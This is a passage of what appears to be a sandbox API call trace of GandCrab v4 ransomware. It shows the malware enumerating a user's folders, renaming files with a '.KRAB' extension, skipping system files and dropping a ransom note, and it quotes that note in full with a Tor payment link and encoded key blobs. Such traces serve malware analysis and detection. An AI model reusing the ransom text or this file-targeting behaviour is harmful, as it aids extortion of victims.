pDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0074.006] WriteFile (in: hFile=0x470, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338de20, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338de20*=0x1f6e, lpOverlapped=0x0) returned 1 [0074.007] CloseHandle (hObject=0x470) returned 1 [0074.008] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.008] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0074.008] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x15, wMilliseconds=0xcd)) [0074.008] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0074.008] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0074.009] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0074.009] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\d2ca4a08d2ca4dee3d.lock") returned 122 [0074.009] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\user\\document themes\\1033\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x470 [0074.009] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.010] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.010] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\") returned 99 [0074.010] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\*" [0074.010] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\*", lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 0x1023df8 [0074.010] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.010] FindNextFileW (in: hFindFile=0x1023df8, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0074.011] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0074.011] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.011] FindNextFileW (in: hFindFile=0x1023df8, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0074.011] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0074.011] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0074.011] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\d2ca4a08d2ca4dee3d.lock" [0074.011] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0074.011] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 127 [0074.011] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\d2ca4a08d2ca4dee3d.lock") returned 122 [0074.011] lstrlenW (lpString=".lock") returned 5 [0074.011] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0074.011] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0074.012] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.012] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.012] FindNextFileW (in: hFindFile=0x1023df8, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0074.012] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0074.012] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0074.012] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\KRAB-DECRYPT.txt" [0074.012] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0074.013] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\KRAB-DECRYPT.txt.KRAB") returned 120 [0074.013] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\KRAB-DECRYPT.txt") returned 115 [0074.013] lstrlenW (lpString=".txt") returned 4 [0074.013] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0074.013] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0074.013] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.013] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\KRAB-DECRYPT.txt") returned 115 [0074.013] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\KRAB-DECRYPT.txt") returned 115 [0074.013] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0074.013] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0074.013] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0074.014] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0074.014] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0074.014] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0074.014] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0074.014] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0074.014] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0074.014] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0074.014] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.014] FindNextFileW (in: hFindFile=0x1023df8, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 0 [0074.014] FindClose (in: hFindFile=0x1023df8 | out: hFindFile=0x1023df8) returned 1 [0074.015] CloseHandle (hObject=0x470) returned 1 [0074.015] FindNextFileW (in: hFindFile=0x1023e38, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 1 [0074.015] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0074.015] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0074.015] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\d2ca4a08d2ca4dee3d.lock" [0074.015] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0074.015] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 122 [0074.015] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\d2ca4a08d2ca4dee3d.lock") returned 117 [0074.015] lstrlenW (lpString=".lock") returned 5 [0074.015] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0074.016] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0074.016] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.016] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.016] FindNextFileW (in: hFindFile=0x1023e38, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 1 [0074.016] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0074.016] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0074.017] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\KRAB-DECRYPT.txt" [0074.017] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0074.017] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\KRAB-DECRYPT.txt.KRAB") returned 115 [0074.017] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\KRAB-DECRYPT.txt") returned 110 [0074.017] lstrlenW (lpString=".txt") returned 4 [0074.017] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0074.017] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0074.017] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.018] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\KRAB-DECRYPT.txt") returned 110 [0074.018] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\KRAB-DECRYPT.txt") returned 110 [0074.018] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0074.018] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0074.018] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0074.018] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0074.018] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0074.018] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0074.018] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0074.018] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0074.018] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0074.018] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0074.018] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.018] FindNextFileW (in: hFindFile=0x1023e38, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 0 [0074.018] FindClose (in: hFindFile=0x1023e38 | out: hFindFile=0x1023e38) returned 1 [0074.019] CloseHandle (hObject=0x468) returned 1 [0074.019] FindNextFileW (in: hFindFile=0x10239b8, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0074.019] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0074.019] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0074.019] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\KRAB-DECRYPT.txt" [0074.019] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0074.019] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\KRAB-DECRYPT.txt.KRAB") returned 99 [0074.019] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\KRAB-DECRYPT.txt") returned 94 [0074.019] lstrlenW (lpString=".txt") returned 4 [0074.019] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0074.020] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0074.020] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.020] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\KRAB-DECRYPT.txt") returned 94 [0074.020] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\KRAB-DECRYPT.txt") returned 94 [0074.020] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0074.020] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0074.020] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0074.020] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0074.020] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0074.020] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0074.020] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0074.020] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0074.021] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0074.021] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0074.021] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.021] FindNextFileW (in: hFindFile=0x10239b8, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0074.021] lstrcmpW (lpString1="SmartArt Graphics", lpString2=".") returned 1 [0074.021] lstrcmpW (lpString1="SmartArt Graphics", lpString2="..") returned 1 [0074.021] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\", lpString2="SmartArt Graphics" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics" [0074.021] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\" [0074.021] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0074.021] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0074.021] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0074.022] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0074.022] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0074.022] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.022] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0074.022] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\\\KRAB-DECRYPT.txt") returned 113 [0074.022] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\user\\smartart graphics\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x468 [0074.023] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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